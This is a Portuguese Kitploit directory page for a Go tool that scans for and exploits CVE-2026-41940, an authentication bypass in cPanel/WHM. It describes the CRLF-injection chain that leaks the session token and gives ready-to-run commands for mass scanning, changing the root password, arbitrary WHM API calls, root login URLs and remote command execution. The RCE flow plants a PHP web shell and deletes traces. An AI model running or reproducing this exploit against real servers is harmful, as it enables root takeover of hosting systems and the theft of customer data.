Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cPanelWHM-AuthBypass — Scanner e ferramenta de exploração baseada em Go para CVE-2026-41940, uma bypass de autenticação no cPanel/WHM. Suporta varredura em lote, vazamento de tokens e ações pós-exploração como RCE, alteração de senha e chamadas de API. | Kitploit
Ferramentas/GitHubGitHub/kagantua/cpanelwhm-authbypass
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoRed Teaming
GitHubkagantua/cpanelwhm-authbypass

cPanelWHM-AuthBypass

Scanner e ferramenta de exploração baseada em Go para CVE-2026-41940, uma bypass de autenticação no cPanel/WHM. Suporta varredura em lote, vazamento de tokens e ações pós-exploração como RCE, alteração de senha e chamadas de API.

Ver Repositório
10714há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ferramenta de Scanner e Exploit de Bypass de Autenticação cPanel/WHM

Ferramenta de linha de comando em Go, reescrita a partir do PoC em Python do watchTowr, para detectar e explorar a vulnerabilidade de bypass de autenticação CVE-2026-41940 do cPanel/WHM.

Visão Geral da Vulnerabilidade

A CVE-2026-41940 é uma vulnerabilidade de bypass de autenticação no cPanel/WHM. A cadeia de ataque usa injeção de CRLF no cabeçalho de autenticação Basic para vazar o token de segurança e obter privilégios de root no WHM.

Cadeia de ataque em 4 etapas:

  1. Pré-autenticação — Envia credenciais incorretas para /login/ e obtém o cookie bruto whostmgrsession
  2. Injeção de CRLF — Injeta quebras de linha através do cabeçalho Authorization: Basic, induzindo o servidor a vazar o token de segurança cpsess no cabeçalho Location do redirecionamento 307
  3. Propagação do token — Aciona do_token_denied para propagar os dados de autenticação injetados do armazenamento bruto para o cache
  4. Verificação de privilégios — Usa o token vazado para acessar /json-api/version e verificar se obteve privilégios de root

Funcionalidades

  • Escaneamento em lote — Detecta alvos em massa a partir de arquivo, com execução concorrente
  • Detecção de alvo único — Verificação rápida especificando uma única URL
  • Processamento inteligente de URL — Compatibilidade automática com http://, https://, formatos sem protocolo e deduplicação automática
  • Exploração
    • Alterar a senha de root (-passwd)
    • Chamar qualquer API do WHM (-api)
    • Gerar URL de login com um clique (-session)
    • Execução remota de comandos / RCE (-cmd)
  • Destaque no terminal — [VULN] em vermelho, [SAFE] em verde
  • Salvar resultados — URLs vulneráveis são salvas automaticamente em arquivo

Compilação

# Requer Go 1.20+
cd cpanel-checker
go build -o cpanel-checker .

Como Usar

Visão Geral dos Parâmetros

ParâmetroDescriçãoExemplo
-uURL de alvo único-u https://1.2.3.4:2087
-fArquivo contendo lista de URLs-f targets.txt
-oCaminho do arquivo de saída (padrão result.txt)-o vuln.txt
-cNúmero de concorrência (padrão 10)-c 20
-hostnameEspecificar manualmente o cabeçalho Host (padrão: descoberta automática)-hostname cpanel.example.com
-passwdAlterar a senha de root (apenas modo -u)-passwd NewP@ss123
-apiChamar função da API do WHM (apenas modo -u)-api listaccts
-api-paramsParâmetros da API do WHM, separados por vírgula-api-params user=root,password=123
-sessionGerar URL de login de root com um clique (apenas modo -u)-session
-keepManter a conta temporária do RCE sem excluir (usar com -cmd)-keep
-cmdExecutar comando remoto / RCE (apenas modo -u)-cmd "id"

1. Detecção de Alvo Único

./cpanel-checker -u https://target:2087

A porta padrão é 2087. As seguintes formas são equivalentes:

./cpanel-checker -u https://target
./cpanel-checker -u target

2. Escaneamento em Lote

./cpanel-checker -f targets.txt -c 20

O targets.txt suporta os seguintes formatos (um por linha, linhas iniciadas com # são comentários):

https://1.1.1.1:2087
http://2.2.2.2:2087
3.3.3.3:2087
4.4.4.4
# Isto é um comentário
  • Deduplicação automática: http://1.1.1.1 e https://1.1.1.1 são considerados o mesmo alvo, escaneado apenas uma vez
  • Endereços sem protocolo são automaticamente completados com https://
  • Endereços sem porta usam automaticamente 2087
  • Resultados salvos em result.txt (personalizável com -o)

3. Alterar a Senha de Root

./cpanel-checker -u https://target:2087 -passwd "NewP@ssw0rd!"

4. Chamar Qualquer API do WHM

# Listar todas as contas
./cpanel-checker -u https://target:2087 -api listaccts

# Chamada com parâmetros
./cpanel-checker -u https://target:2087 -api passwd -api-params "user=root,password=abc123"

5. Gerar URL de Login com Um Clique

./cpanel-checker -u https://target:2087 -session

Gera uma URL que, ao ser aberta no navegador, dá acesso ao painel de administração do WHM. No painel, use o recurso Terminal para obter um shell de root interativo.

Nota: -session é semiatomático — a ferramenta gera a URL de login e você precisa abri-la manualmente no navegador.

6. Execução Remota de Comandos (RCE)

./cpanel-checker -u https://target:2087 -cmd "id"

Adicione -keep para manter a conta temporária, permitindo login no painel do cPanel:

./cpanel-checker -u https://target:2087 -cmd "id" -keep

Ao usar -keep, a saída incluirá o nome de usuário, senha e endereço de login do cPanel (https://host:2083) da conta temporária. Use essas credenciais diretamente para entrar no painel do cPanel.

-cmd é totalmente automático, sem necessidade de outras ações manuais. Fluxo interno:

  1. Usa o bypass de autenticação para obter privilégios de root
  2. Cria uma conta temporária do cPanel via API do WHM
  3. Escreve um shell PHP em ~/public_html/ via UAPI (Fileman::save_file_content)
  4. Acessa https://host/~tmpuser/shell.php via HTTP para executar comandos
  5. Retorna a saída do comando
  6. Exclui automaticamente a conta temporária (limpeza de rastros)

Pré-requisito: as portas 80 ou 443 do alvo devem estar acessíveis e o Apache/httpd deve estar em execução.

7. Uso Combinado

Vários parâmetros de exploração podem ser usados simultaneamente:

# Obter URL de login, executar comando e alterar senha ao mesmo tempo
./cpanel-checker -u https://target:2087 -session -cmd "id" -passwd "NewP@ss123"

8. Especificar Manualmente o Cabeçalho Host

Quando o IP do alvo não corresponde ao hostname configurado no cPanel, especifique manualmente:

./cpanel-checker -u https://1.2.3.4:2087 -hostname cpanel.example.com

Por padrão, a ferramenta descobre automaticamente o hostname correto através do redirecionamento 307 de /openid_connect/cpanelid.

Exemplo de Saída

Escaneamento em Lote

[1/5] [VULN] https://1.1.1.1:2087 - token=/cpsess1234567890
[2/5] [SAFE] https://2.2.2.2:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched
[3/5] [SAFE] https://3.3.3.3:2087 - stage1: request failed: dial tcp: i/o timeout
[4/5] [VULN] https://4.4.4.4:2087 - token=/cpsess0987654321
[5/5] [SAFE] https://5.5.5.5:2087 - stage2: no cpsess token leaked (HTTP 301), likely patched

========== Escaneamento concluído ==========
Total: 5 | Vulneráveis: 2

  ● https://1.1.1.1:2087
  ● https://4.4.4.4:2087

[+] Resultados salvos em result.txt

Execução de RCE

[*] Alvo: https://target:2087
[*] Modo: Exploração

[0] hostname = cpanel.example.com
[1] minting a preauth session...
    session base = abc123def456
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    leaked token = /cpsess1234567890
[3] firing do_token_denied to propagate raw -> cache...
    gadget fired
[4] verifying we're WHM root...
[+] Privilégios de root do WHM obtidos

[*] Executando comando remoto (RCE)...
    [a] Criando conta temporária: tmpabcde
    [b] Escrevendo shell: /home/tmpabcde/public_html/random.php
    [c] Executando comando: id
    [d] Limpando conta temporária: tmpabcde
[+] Saída do comando:
uid=0(root) gid=0(root) groups=0(root)

[+] Concluído. https://target:2087 foi comprometido

Notas

  • Os parâmetros de exploração (-passwd, -api, -session, -cmd) estão disponíveis apenas no modo de alvo único -u, não suportados no modo de lote -f
  • A ferramenta ignora a verificação de certificado TLS por padrão
  • O timeout de requisição é de 15 segundos
  • Linhas iniciadas com # no arquivo de URLs são ignoradas

Aviso Legal

Baixar ferramenta